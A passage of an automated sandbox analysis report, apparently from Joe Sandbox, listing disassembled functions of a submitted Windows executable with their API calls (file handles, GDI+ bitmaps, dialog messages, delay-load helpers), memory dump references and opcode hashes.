                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: d51ab55034d1e0b946b1eb9456b76d6ebc4e6e95566b935e905be552a785ee1c
                                                                                              • Instruction ID: 5af0035c5c704d32f1a73c5aa95479a7cb769db48da9201173ffd696a2032465
                                                                                              • Opcode Fuzzy Hash: d51ab55034d1e0b946b1eb9456b76d6ebc4e6e95566b935e905be552a785ee1c
                                                                                              • Instruction Fuzzy Hash: 8AE0E521740661ABEB7926696C00BDA778EDB513B0F15C230AC14E6081DF20CCC145F5
                                                                                              Function 000FA4C6 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 000FA4F5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseFind
                                                                                              • String ID:
                                                                                              • API String ID: 1863332320-0
                                                                                              • Opcode ID: 0fb47eda8866c78438eb4caede43f98c6c98eaed7a26d2796f076a57482f70ce
                                                                                              • Instruction ID: f3c15e53ae64aa6a117101eb49ae4f92d8d67a7e8bba4397a81aa52c4e1f9ed8
                                                                                              • Opcode Fuzzy Hash: 0fb47eda8866c78438eb4caede43f98c6c98eaed7a26d2796f076a57482f70ce
                                                                                              • Instruction Fuzzy Hash: 96F0B471008784AACA321B7888047E67BD06F07321F04CA09F2FD02592C2B42495AB23
                                                                                              Function 0010067C Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetThreadExecutionState.KERNEL32(00000001), ref: 001006B1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExecutionStateThread
                                                                                              • String ID:
                                                                                              • API String ID: 2211380416-0
                                                                                              • Opcode ID: 7ca2f1613f8d7648a1a357c9f5fa60404f2c69c8ce11bb43fc76174e2057ec20
                                                                                              • Instruction ID: 292a9db37de8fdc853fa7cd79577833b787b9f72a24bb141b3e7d323fa23838d
                                                                                              • Opcode Fuzzy Hash: 7ca2f1613f8d7648a1a357c9f5fa60404f2c69c8ce11bb43fc76174e2057ec20
                                                                                              • Instruction Fuzzy Hash: C1D0C23524001077C6223334A8057FE1A5B0FCA720F080021B18D179C38B8B08C652A2
                                                                                              Function 00109D7B Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GdipAlloc.GDIPLUS(00000010), ref: 00109D81
                                                                                                • Part of subcall function 00109B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00109B30
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                              • String ID:
                                                                                              • API String ID: 1915507550-0
                                                                                              • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                                                                                              • Instruction ID: 56a263e1c4322b763be215eea70db741ad8f4475106598ec8c6cf94448a9b79c
                                                                                              • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                                                                                              • Instruction Fuzzy Hash: F3D0A73025420C7ADF40BAB18C1297A7BA9DB10310F004065BC88861C2EFF1DE10A361
                                                                                              Function 000F9989 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileType.KERNELBASE(000000FF,000F9887), ref: 000F9995
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileType
                                                                                              • String ID:
                                                                                              • API String ID: 3081899298-0
                                                                                              • Opcode ID: bdfa6a67952cce1ce4dc0bfc0fa35885460599a3aa58427d96ba7f6a7c56a4fc
                                                                                              • Instruction ID: 39a972894cbb832358cb6172a4eb2ff6e1f8d2e95542b8117f1523a01032af42
                                                                                              • Opcode Fuzzy Hash: bdfa6a67952cce1ce4dc0bfc0fa35885460599a3aa58427d96ba7f6a7c56a4fc
                                                                                              • Instruction Fuzzy Hash: 3BD01231015144A58FB5463C4D092BA7791DB83366B39C6ACE125C44A1D767C843F541
                                                                                              Function 0010D41A Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0010D43F
                                                                                                • Part of subcall function 0010AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0010AC85
                                                                                                • Part of subcall function 0010AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0010AC96
                                                                                                • Part of subcall function 0010AC74: IsDialogMessageW.USER32(00010412,?), ref: 0010ACAA
                                                                                                • Part of subcall function 0010AC74: TranslateMessage.USER32(?), ref: 0010ACB8
                                                                                                • Part of subcall function 0010AC74: DispatchMessageW.USER32(?), ref: 0010ACC2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 897784432-0
                                                                                              • Opcode ID: cf546f67d6c140044d627117282aff08fc99f6a9806a22696d20177fa8baf8ec
                                                                                              • Instruction ID: e29cb7b45bae0ebc153f163dca36cf2784cad1cc95f0f1b2eb7d4eb021da48d2
                                                                                              • Opcode Fuzzy Hash: cf546f67d6c140044d627117282aff08fc99f6a9806a22696d20177fa8baf8ec
                                                                                              • Instruction Fuzzy Hash: CDD09E72144300ABD6152B51CE06F1F7AA6BF98B05F404554B345748F2C672AD60AB16
                                                                                              Function 0010D891 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 698361f3830b916582a7b91289d06d2f9ea0d53155ae5a8d3526df6904fe5018
                                                                                              • Instruction ID: aee3711fd61643a2282db12ed573ac3b98c5ecb3d85d5980831998bad3d9d466
                                                                                              • Opcode Fuzzy Hash: 698361f3830b916582a7b91289d06d2f9ea0d53155ae5a8d3526df6904fe5018
                                                                                              • Instruction Fuzzy Hash: DFB092A626C602ACA1082180799283B0208C481B11325852AF589A40C09BC06C494831
                                                                                              Function 0010D8B6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: e6c1e2f76b95a0752e054bc6de5e3295a2f68bff97ce9113001cfd6b3a861d17
                                                                                              • Instruction ID: 722487e840f42871f2a1dc341fc49e3bb55ea6eaed21573810d07f88974d5985
                                                                                              • Opcode Fuzzy Hash: e6c1e2f76b95a0752e054bc6de5e3295a2f68bff97ce9113001cfd6b3a861d17
                                                                                              • Instruction Fuzzy Hash: 65B092A226D402ACA108618479829360208C482B11328C01AF989E41C0D7C0680A0931
                                                                                              Function 0010D8AC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 7e469321f137d198d3762826fb15fbd2eca81f9725350d7c722dad9dd8dd7e98
                                                                                              • Instruction ID: e12ce1f3992b1d0061be412e4e379b8e3a5d1b87b17de5554783271c40ce3e54
                                                                                              • Opcode Fuzzy Hash: 7e469321f137d198d3762826fb15fbd2eca81f9725350d7c722dad9dd8dd7e98
                                                                                              • Instruction Fuzzy Hash: ECB012B626C506ECB10C61D47DC2D3B030CD4C1B11334C01BF589E40C0D7C07C090A31
                                                                                              Function 0010D8DE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: b80cfb61f88420f16896248b1a12d3f1c9a2d2b2d3b4d93f7471c13cd3192d04
                                                                                              • Instruction ID: 76e7d07fb244936c4917591413072492dddcedbb51ae05d1d9fc6772217658f0
                                                                                              • Opcode Fuzzy Hash: b80cfb61f88420f16896248b1a12d3f1c9a2d2b2d3b4d93f7471c13cd3192d04
                                                                                              • Instruction Fuzzy Hash: 65B012B326C502ECB10C61C47D82D37030CC4C2B11334C01BF98DE40C0D7C06C090931
                                                                                              Function 0010D8C0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 5ac988909644be028f81771c0413d10f6a313c10417258aa55cbb350ec52648f
                                                                                              • Instruction ID: 9a45686dae1dd7016b97aff7818851d39644011520c2e102adc00ae82792075e
                                                                                              • Opcode Fuzzy Hash: 5ac988909644be028f81771c0413d10f6a313c10417258aa55cbb350ec52648f
                                                                                              • Instruction Fuzzy Hash: BEB092A226C502ACA148618479829360208C481B11329C11AF589E41C0DBC0688A0931
                                                                                              Function 0010D8CA Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: ed7e81d46436d9786a2667715349f4059ec14484e3035c54461cd015dda38491
                                                                                              • Instruction ID: 281ea63ab53c553701a7a5be100307a8a40b81cb00b428eb581bf719c800b85c
                                                                                              • Opcode Fuzzy Hash: ed7e81d46436d9786a2667715349f4059ec14484e3035c54461cd015dda38491
                                                                                              • Instruction Fuzzy Hash: 2BB092A226C402ACA10C61847A829360208C481B11328C01AF589E41C0D7D0680E0931
                                                                                              Function 0010D8F2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 1bce245ea1464c0c19df01118efa510a3248f4781218a8abd08a5036052ea1d1
                                                                                              • Instruction ID: 1cc85c768c613eff251b89386e0ff676a07c1d0d5efd5e80ce8a556ebecc6e64
                                                                                              • Opcode Fuzzy Hash: 1bce245ea1464c0c19df01118efa510a3248f4781218a8abd08a5036052ea1d1
                                                                                              • Instruction Fuzzy Hash: F1B012B226C402ECB10C61C47E82D37030CC4C1B11334C01BF58DE40C0E7C06D0A0931
                                                                                              Function 0010D8FC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 8bc6b186350702ca02ac488fdb93906ea5408a36d189af3e19782b88fd32c4d5
                                                                                              • Instruction ID: 313d5272238d8feea385f282f5da7f31e4bc7728ce9b39f8de046e4f636a4482
                                                                                              • Opcode Fuzzy Hash: 8bc6b186350702ca02ac488fdb93906ea5408a36d189af3e19782b88fd32c4d5
                                                                                              • Instruction Fuzzy Hash: 26B012B226C402ECB10C61D57D82D37030CC4C1B11334C01BF58DE40C0D7C06C090931
                                                                                              Function 0010D8E8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: cb58d490cf163ff764e08c73b077791314d5bf32af771538b37896f280408bdd
                                                                                              • Instruction ID: 5735d1b4506cabfdcc2674905e1f2e9fecb94b13ede9fa753b14eb48fbd541fd
                                                                                              • Opcode Fuzzy Hash: cb58d490cf163ff764e08c73b077791314d5bf32af771538b37896f280408bdd
                                                                                              • Instruction Fuzzy Hash: 3DB012B226C502ECB14C61C47D82D37030CC4C1B11335C11BF58DE40C0DBC06C490931
                                                                                              Function 0010D910 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010D8A3
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
